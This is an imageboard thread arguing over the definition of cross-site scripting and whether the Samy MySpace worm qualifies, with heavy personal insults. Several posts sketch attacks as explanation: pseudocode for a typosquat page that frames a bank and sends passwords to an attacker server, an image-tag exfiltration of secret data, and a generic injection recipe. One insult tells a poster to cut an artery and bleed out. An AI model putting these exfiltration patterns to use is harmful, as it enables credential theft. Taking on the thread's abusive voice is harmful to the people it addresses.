>>25211229
From memory, browser vulnerabilities letting a request originating from one site receive private information (such as a cookie value) from another.

Going to check now how accurate I was.

>>25211229
Pretty much tricking a site to run code that you want to. I remember back in the myspace days some guy added code to his profile that made you add him as a friend and added the code to your profile to make anyone else do the same.

>>25211311
Samy's stunt was not XSS by the very term. '*Cross* Site Scripting'; it remained all within MySpace.

>>25211348
It's still XSS.

>>25211531
No.

I didn't remember about the proper term, but it is just an injection. HTML/JS (markup/script, really) injection.

In fact, okay, Samy's script *is* cross-site, strictly speaking, but only owing to MySpace's domain design decision. True XSS would be injection of a script that reads, for instance, local storage from site X, and XMLHTTPRequests it to my site in the query string.

>>25211605
https://security.stackexchange.com/questions/37362/why-is-the-samy-worm-considered-xss

>>25211605
>XMLHTTPRequests it to my site in the query string

Or, if it's impossible, embeds an <img src='mysite?readsecretdata'>; whatever.

>>25211618
That page literally just says 'yeah, the term is technically wrong'.

>>25211648
Everyone calls it XSS so it's XSS don't be so literal m8.

>>25211689
>Everyone calls it XSS so it's XSS

'Everyone is wrong so you should be wrong too.'

Go to the kitchen, get a knife, cut an artery, and bleed out.

>>25211761
But they're not wrong.
XSS does not mean it must be betweens different sites.
If you have a problem go yell at whoever came up with the term.

Could someone who knows about this shit post contact info?

>>25211780
>XSS does not mean it must be betweens different sites.

'"Cross-Site Scripting" does not mean it must be cross different sites.'

Are you okay, anon?

>>25211780
>If you have a problem go yell at whoever came up with the term.

Also. The creator is not wrong; they knew what they meant. Who's at fault is you, who popularizes the incorrect usage.

>>25211815
You know the creator and what they meant?
The term XSS is used to refer to attacks that would include Samy.
If you disagree you are using a definition that most do not.
This isn't the first time the literal interpretation of a term disagrees with it's use.

>>25211880
>If you disagree you are using a definition that most do not.

Yes. Those people are wrong.

>This isn't the first time the literal interpretation of a term disagrees with it's use.

Yes. All those definitions must be corrected.

>>25211880
>>25211915
And even if correctness for correctness' sake weren't enough, which it *IS*, there'd be practical benefits: pedagogical (motivational) and linguistic (increasing morphemic awareness, as when I mentioned that 'patriarchy' should rather be 'andrarchy' (disregarding the merits of the notion at the moment)).

tl;dr you're very wrong.

>>25211915
Well we're not going to accommodate your autism sorry.

>>25211972
Maybe; but this doesn't mean that I should stop trying to convince you of >>25211958, of the fact that you're confusing newcomers to webdev/websec who must learn and adopt an inconsistency, and so on.

>>25211986
I think it's more misleading to simply tell someone Samy is not XSS when most would call it XSS. Instead you could explain that the term is misleading.

>>25212095
>Instead you could explain that the term is misleading.

And what do you think I did for the last dozen of posts?

When you mention that a term is wrong, explanation usually follows anyway; but without a mention, it never will.

>>25212123
>And what do you think I did for the last dozen of posts?

(In fact in the very post in which I first denied, too.)

Here's what you can do in very rough psuedocode

>make a site sitting at www.bankign.com that looks like this
<script = "myscript.js">
<iframe id="myframe">
</iframe>

>myscript.js looks like this:
document.myframe.source = "www.banking.com";
while(1) {
pass = document.myframe.PasswordField.text
send(pass, myserver.com)
}

See, you make a dummy website sitting at a misspelling of banking.com.
The dummy site contains a frame which takes up the whole page. You can load another entire website into a frame, so the dummy site loads in banking.com.
The javascript in the dummy site accesses the password field in the loaded in webpage and continually sends it's contents to an attacker's server (myserver.com).

I found all this out when I first discovered javascript and though I could make some cool overlay for the websites I browsed. As it turns out, on all browsers, you can only access elements loaded into a frame if the loading page and loaded page are on the same server. So my cool overlay site stored on my desktop couldn't fiddle with or access the buttons and text on wikipedia or whatever.

>>25212123
Only because I disagreed.
Originally you didn't which could be confusing if they see it called XSS everywhere else.

>>25212250
>Only because I disagreed.

No, again, as I said in >>25211348, 'it remained all within MySpace'.

>>25212196
>while(1) send(pass, myserver.com)

Way to DoS your own server.

I suggest onSubmit.

>>25212439
You didn't state or imply that the commonly accepted meaning of XSS is misleading, you made it sound like the previous anon was simply mistaken and that Samy is not called XSS.

>>25212569
>You didn't state or imply that the commonly accepted meaning of XSS is misleading, you made it sound like the previous anon was simply mistaken and that Samy is not called XSS.

Literally the opposite. There was nothing in my post about the adoption or application of the term, while I *emphasized* 'cross', so to tell right from the start that the issue is between cross-site and same-site requests.

Just leave the thread.

>>25212742
>hat the issue is between cross-site and same-site requests.
But that's not the issue. It's with sites that allow js and malicious code to be injected by not sanitizing etc.

>>25212790
I give up. You probably are a person who'd call synchronous JSON-returning requests 'AJAX', too.

>>25212829
>synchronous JSON-returning requests
*synchronous JSON-returning requests in VBScript

>>25212829
But your usage of XSS disagrees with he accepted usage, when you corrected the anon you acted as if your definition was THE definition.

>>25212860
You're grasping at imaginary insults now.

>>25212886
>>25212860
(And repeating yourself, too -- I disproved the 'you sounded as if you were talking about usage, not about meaning' back in >>25212742 already.)

>>25212886
>>25212904
What are you talking about?
You said
>Samy's stunt was not XSS by the very term. '*Cross* Site Scripting'; it remained all within MySpace.
When most would call Samy XSS. If you look up Samy is described as XSS, just because you're anal over the term doesn't change that.
I didn't insult you. Also try writing your posts as one reply.

>>25213011
I am exceptionally tolerant of trolls wasting my time, but I draw the line at the point when they repeat themselves.

>>25213217
Can't admit your post was misleading?

>>25213266
It really is sad, troll, that you can only hope to convince that you have a point those people who won't have bothered to read the thread.

>>25213289
Are you serious dude?
When every thing calls Samy XSS except you maybe your the one who is wrong.
Telling someone that Samy is not XSS is misleading because using the accepted definition of XSS it is.
I guess you're autistic abut anything like this since you apparently tried to convince people that patriarchy should be changed as well?

>>25213315
>your

Get back to programming, anon. I'm pretty sure there are some exciptions waiting to be thrown and constructers to initialize.

>>25213339
>one typo out of all the posts
Way to miss the point.
>Get back to programming, anon.
And what are you? Pro bono internet pedant?

>>25213361
>Way to miss the point.

All fallacies of yours I have already addressed, some more than once.

>>25213395
What fallacies?
Samy is XSS attack, you corrected anon and implied it was not.

>>25213395
Honestly I'm starting to think you're the troll here, did you start this thread just to prompt your pedantic reply?

>>25213419
>>25213432
A webdev task for you, anon: write an imageboard bot that chats using the same sophistry as you. It's not that hard; it's basically Eliza-tier keyword reaction, 'what fallacies?' to /\bfallac/, 'can't admit you're wrong' to indicative third person clauses, 'you missed the point' randomly, and so on.

>>25213475
Although I admit, your claim in >>25213315 that I mislead because I correct a widespread incorrect definition gets points for sheer nerve.

>>25213475
I'll write one for you. When asked a question like "what fallacies?" it can dodge it and respond with something irrelevant, it will also randomly claim it was insulted or call the other person a troll.

>>25213499
Haha seriously what's the matter with my claim?
How is it not misleading? You said Samy is not XSS when Samy is classified as a XSS attack.
>Get back to programming, anon.
No you simply tried to use your pet definition, if security experts, companies, and others all use the other definition that disagrees with yours you are the one who is incorrect and it IS misleading.

Web page or backed is shit.
Post field that escapes out of html and dumps your js in the source.
Insert js that grabs user data/spams site/whatever in window.onload
???
Profit

>>25213552
>You said Samy is not XSS when Samy is classified as a XSS attack.

Yes.

Yes.

Finally, you understood something.

>>25213629
That is why your post was misleading.

>>25213572
>Web page or backed is shit.
>or backend

I can't quite imagine XSS outside HTTP/WWW, because it implies a system where units of different origins (domains) issue requests, which basically means a browser. Examples?

>js that grabs user data/spams site

Has to be the former for XSS, unless it spams *other* sites.

>>25213643
>implying your misuse of the term 'mislead' isn't even worse than your misuse of the term 'XSS'

>>25213696
>I can't quite imagine XSS outside HTTP/WWW

(Though maybe it can be generalized to all communication, e.g. XSS is any time that something executes something without checking origin. Not sure. Sage.)

>>25213696
>Has to be the former for XSS, unless it spams *other* sites.
Stop trying to force YOUR definition you autist.

>mislead
>cause (someone) to have a wrong idea or impression about someone or something.
"the government misled the public about the road's environmental impact"
How did I misuse it? You just did it again. When everyone else disagrees with you about what XSS means you're the one who is wrong anon.

>>25213757
>Stop trying to force YOUR definition you autist.

>some poor guy came up with 'Cross-Site Scripting' to refer to scripts used to retrieve data cross-site
>people begin to use it to just mean request scripting
>side with the frigging original author
>'stop trying to force your definition!'

0/10.

>>25213790
Of course, that explicitation is going to go waste, because you're just going to keep spamming your 'no ur wrong'.

>>25213790
>>some poor guy came up with 'Cross-Site Scripting' to refer to scripts used to retrieve data cross-site
Source? Or are you just making up a narrative to fit your definition?
Does the fact that it says Cross Site and yet can refer to things like Samy trigger you this bad?

>>25213809
Stop replying to your posts just use P.S.

>>25213824
>>some poor guy came up with 'Cross-Site Scripting' to refer to scripts used to retrieve data cross-site
>Source? Or are you just making up a narrative to fit your definition?

Source that the author of the term 'double cheeseburger' had in mind a burger that is double and contains cheese?

1/10. I see improvement.

>>25213855
So no source, just assumption? You act as if the one who coined the term is in anguish at how it's used now. I think that's only you.
If the technical community uses a technical term to mean one specific thing then that is what it means. No amount of hemming and hawing over the literal interpretation will change that.

>>25213914
>a four-legged animal has seven motor appendages
>no it doesn't
>stop assuming things!

It gets better, it really does.

>>25213933
If everybody and all the biologists called animals with seven appendages four-legged animals your comparison would make some sense. As it is now it doesn't and is just a shitty way to argue.

Are you autistic?

>>25213973
>If everybody and all the biologists called animals with seven appendages four-legged animals your comparison would make some sense.

And if everybody saw that a 8 cm stick is longer than a 12 cm one, it really would be.

As for autism, you definitely do not have it. Only allists would be so thoroughly attached to appeal to authority/appeal to majority.

>>25214004
>As for autism, you definitely do not have it.
So is that a yes? You are autistic?
> Only allists would be so thoroughly attached to appeal to authority/appeal to majority.
Or linguists.

>>25214004
Of course, long past is the phase of the thread that I had a chance to elaborate on how, for instance, laxness of definitions is a short-term, narrow-sighted solution, teaching and leading people to think in crude keywords, rather than clarifying their thoughts exactly... 'wait, it is not *really* same site, is it'.

>>25214054
>>As for autism, you definitely do not have it.
>So is that a yes?

If you are as logical as your reasoning is strict, then I can understood how you can find this 'reasoning' here valid, yes.

>>25214078
>refusing to answer a simple question
okay dokey.

>>25214064
You obviously have some strong personal beliefs on taxonomy, I find it odd and humorous to be honest.

>>25214054
>linguists

Being a linguist has nothing to do with accepting the majority's definitions. Linguists just study the kind of misdefinitions you partake in; they exhibit them no more themselves than they can be convinced, for instance, that 'grammar is about words' while in reality, a word is an insufficient concept in the face of various further distinctions, such as punctuation (in some scripts nonexistent), enclitics, root morphemes, lack of effective distinction between affixes and adpositions (e.g. pre-/postpositions), and so on, which make the term essentially useless (give me a linguist who talks about 'words') -- which is an equivalent of your crude insistence that 'XSS is about injection', dismissing and obscuring finer points.

>>25214100
That was not a question.

>>25214229
Your insensitive that XSS is about cross site is just as dismissive and obscuring of finer points.
>That was not a question.
Yes it was.
>Are you autistic?
>So is that a yes? You are autistic?
Those are questions.

>>25214229
>'XSS is about injection'

In other words, saying that is like saying 'rollbacks are about safety'.

>>25214270
>Your insensitive that XSS is about cross site is just as dismissive and obscuring of finer points.

I don't deny existence of other, necessary conditions for XSS, such as, well, there being a script -- I just point out that this one is necessary.

While you explicitly insist that a necessary condition, cross-site requests, isn't.

Back to 0/10.

>>25214270
No, those are insults in the interrogative.

>>25214270
>Your insensitive that [...]

A trilemma!

Is your error a misspelling of 'you're', a misformation of 'insensitivity', or an omission of 'claim'?

>>25214357
But why is cross-site requests a necessary condition? Only you think it is.
>No, those are insults in the interrogative.
It was a simple question, it's on you that you took it as an insult. I was merely curious.

>>25214385
It auto-corrected to insensitive instead of insistence.

>>25214422
>But why is cross-site requests a necessary condition?

'Why do things' names have to correspond to those things?'

Deep, man.

>Only you think it is.

For the second time ITT, you said something true.

>>25214489
>For the second time ITT, you said something true.

(Well, as a matter, you didn't -- there are hundreds of people who point out misdefinition of 'XSS' and I could have quoted any of them, but that would be appeal to majority, which is invalid. And you would ignore it anyway.)

>>25214489
>'Why do things' names have to correspond to those things?'
Names correspond to the things we use them for. There is no de jur basis just de facto.

>>25214508
wow hundreds!

>>25214540
>things aren't wrong because whatever we choose to do is right by virtue of having been chosen to do

>>25214540
In a post:
>only you think so
One post later:
>haha only hundreds of people think so? weak

>>25214570
>>25214540
Still, I'm tired and I'd rather listen to music than witness this waste of a technology thread anymore.

Here's your space for your final implication that I'm wrong:
[...
...
...]

File: 1389229586991.png (40 KB, 611x425) Image search: [Google]

40 KB, 611x425

>>25214570
>wrong
You have such a rigid idea of what things can possibly mean.

>>25214606
Have fun "correcting" people in the future.

>>25214621
>You have such a rigid idea

Enjoy your fluffy, feminine programming in which terms are 'kinda sorta about' other things.

>>25214637
>Enjoy your fluffy, feminine programming in which terms are 'kinda sorta about' other things.
>I'll just throw in some adjectives, that'll show him!
Programming has clear definitions obviously and XSS has a fairly clear definition it's just not the one you seem to have landed upon.

>>25214660
>Programming has clear definitions
>>25214660
>XSS has a fairly clear definition

Uh, no. You seem to be under an arbitrary, source-less impression that a definition is about pointing out ('de-') the binary boundaries ('fines') of a word. This is a narrow-minded, rigid belief. In fact, a definition is not about that; that's just an etymological fallacy. If the majority agrees that a definition is ambiguous and cannot be pinpointed exactly, then this is true. There is no such thing as a 'clear definition' -- where are you getting such things? You are so inflexible.


Are you autistic?

>>25214735
>>25214660
In short, stop looking up to words' etymologies for justification of your odd, one-man beliefs.

>>25214735
You are the inflexible one who points out binary boundaries of a word. You insist that cross site is a requirement for XSS.
>If the majority agrees that a definition is ambiguous and cannot be pinpointed exactly, then this is true.
I thought you disliked appeals to the majority?
>Are you autistic?
No. See I answered the question without sidestepping.

>>25214755
>In short, stop looking up to words' etymologies for justification of your odd, one-man beliefs.
Haha what? You are the one with the one-man belief far more people share my definition of XSS than yours